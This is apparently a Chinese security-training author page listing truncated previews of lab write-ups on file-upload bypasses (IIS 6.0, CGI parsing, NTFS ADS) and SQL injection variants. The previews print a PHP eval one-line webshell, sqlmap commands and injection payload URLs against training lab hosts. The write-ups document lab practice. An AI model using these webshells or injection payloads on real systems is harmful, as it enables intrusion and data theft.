Track 实习学员

crustsalt

0关注
0粉丝
30文章
返回网站首页

您已发布 30篇文章作品写文章

非法字符截断上传 — Windows NTFS ADS流

首先我们写一个马<?php eval($_POST[cmd])?>然后改成php后缀用bp进行抓包发现包如图所示POST /Pass-08/index.php?action=show_code HTTP/1.1Host: 120.203.13.75:8125User-Agent: Mozilla/5.0 (Windows&

 2018-11-14
 0 
 10 

CGI解析漏洞

先写好一句话木马<?php eval($_POST[cmd])?>然后保存为aaaa.jpg上传一下25上传文件名: aaaa.jpg文件类型: image/jpeg文件大小: 0.0244140625 kB文件存储在: ./c/image/1542200641.jpg开菜刀,在地址后面加一个1.php连接后就可以看到f

 2018-11-14
 0 
 8 

IIS6.0解析漏洞

先贴一下我所知道的(以我夕阳红记忆力还记得的)iis6.0的漏洞有哪些1、;的解析问题:比如我们上传1.asp;.jpg,waf会检测到最后一个后缀,也就是jpg格式,而iis6.0会因为;的截断,导致会认为这个文件是1.asp,便会以asp格式解析它。2、%00截断问题,和第一种近乎一样,%00直接使iis忽略%00之后的字符串,达到和第一种方法一样的效果。3、iis会把例如a.asp文件夹下所

 2018-11-13
 0 
 15 

SQL注入-Post注入

Rank 1发现是登陆栏,在用户名输入输入admin admin发现可以成功登陆,并且显示了sql语句,我们输入用户名为admin' order by 3#,密码为空,结果为Unknown column '3' in 'order clause'我们再试试order by 2,发现可以,说明有两个字段。我们试

 2018-11-12
 0 
 9 

sql注入--head注入

Rank 1首先我们进入网址,输入admin admin,再用hackbar打开post和useragent来loadurl,尝试再useragent里输入1,发现页面有一行Your User Agent is: 1我们加一个单引号Your User Agent is: 1'You have&nbs

 2018-11-11
 0 
 24 

SQL注入-延时注入

其实这就和盲注一样啊 sqlmap跑起来sqlmap.py -u url -p id --technique T --dbssqlmap.py -u url -p id --technique T --tablessqlmap.py -u url -p id --technique T --columns即可

 2018-11-9
 0 
 16 

SQL注入-宽字节注入

Rank 1首先我们来看一下有几个字段http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=1%df%27%20order%20by%203--+不报错,也就是说有三个字段http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=-1%df%27%20un

 2018-11-9
 1 
 21 

SQL注入-盲注&延时注入

Rank1盲注手注版id=1 and(ascii(substr(database()1,1)))>115--+就是截取database()的第一个字符,把它转化成ascii码,在和115比大小,如果比115大,因为and的缘故,页面会正常显示,如果不成立,页面应该无显示,因为就等于 id=1 and 0,应该是错误的。如果115不对,我们可以换成107,用二分法求解效率较高。但是手注比较麻烦

 2018-11-9
 0 
 18 

SQL注入-显错注入 Rank 1-4

Rank1首先我们加上id参数http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1加个单引号试试http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1%27Your sql statement is SELECT&nb

 2018-11-8
 0 
 10 

Oracle注入- 报错注入

首先通过报错注入查出有哪些数据库http://o1.lab.aqlab.cn:81/?id=-1%27%20and%201=ctxsys.drithsx.sn(1,(select%20user%20from%20dual))%20--+结果为Warning: oci_execute(): ORA-20000: Oracle Text error:&

 2018-11-6
 0 
 6